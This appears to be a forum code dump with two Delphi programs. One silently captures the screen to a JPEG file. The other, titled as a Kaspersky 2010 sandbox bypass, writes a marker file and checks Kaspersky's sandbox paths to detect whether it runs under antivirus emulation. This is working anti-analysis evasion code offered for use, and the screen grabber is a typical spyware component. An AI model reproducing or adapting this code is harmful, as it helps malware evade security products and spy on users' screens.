[Delphi] Screen Capture with parameters Author: zoom (cred) program ScreenShot; uses Windows, Graphics, Jpeg; procedure ScreenToFile(FileName: string; Quality: Word; Percent: Word); var Bmp: TBitmap; Jpg: TJpegImage; begin Bmp := TBitmap.Create; Jpg := TJpegImage.Create; try Bmp.Width := GetDeviceCaps(GetDc(0), 8) * Percent div 100; Bmp.Height := GetDeviceCaps(GetDc(0), 10) * Percent div 100; SetStretchBltMode(Bmp.Canvas.Handle, HALFTONE); StretchBlt(Bmp.Canvas.Handle, 0, 0, Bmp.Width, Bmp.Height, GetDc(0), 0, 0, GetDeviceCaps(GetDc(0), 8), GetDeviceCaps(GetDc(0), 10), SRCCOPY); Jpg.Assign(Bmp); Jpg.CompressionQuality := Quality; Jpg.SaveToFile(FileName); finally Jpg.free; Bmp.free; end; end; begin ScreenToFile('SHOT.JPG', 50, 70); end.

[Delphi] Bypass KAV 2010 Sandbox Author: chaincoder program KAV; uses WINDOWS,sysutils; PROCEDURE SAVE(NEWDROPPATH:STRING); var F:FILE; BUFFERSTRING :STRING; BEGIN AssignFile(F, NewDropPath); Rewrite(F, 1); BUFFERSTRING:='555555555555555555555555555'; If (IOResult = 0) Then Begin BlockWrite(F, BufferString[1], Length(Bufferstring)); CloseFile(F); End; END; Function TranslateMacro(Macro: String): String; Var Size :Cardinal; Output :Array[0..MAX_PATH] of Char; Begin Result := ''; FillChar(Output, SizeOf(Output), #0); Size := SizeOf(Output); Size := GetEnvironmentVariable(PChar(Macro), Output, Size); If (Size > 0) Then Result := Output; End; VAR DAT : STRING; KIS : STRING; APP : STRING; i : INTEGER; FOUND : BOOLEAN; begin DAT:=TranslateMacro('APPDATA'); DELETE(DAT,1,2); FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; DELETEFILE(kis); end; FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; DELETEFILE(kis); end; app:= TranslateMacro('APPDATA')+'\1.txt'; save(app); FOUND:=false; FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; if fileexists(kis) THEN BEGIN FOUND:=TRUE; BREAK; END; end; FOR I:=0 to 100 do begin KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT'; if fileexists(kis) THEN BEGIN FOUND:=TRUE; BREAK; END; end; // deleteFILE(win); if FOUND then MESSAGEBOX(0,pchar('RUNNING INSIDE KAV)'),'STATUS',0) ELSE MESSAGEBOX(0,pchar('NOT RUNNING INSIDE KAV)'),'STATUS',0) ; end.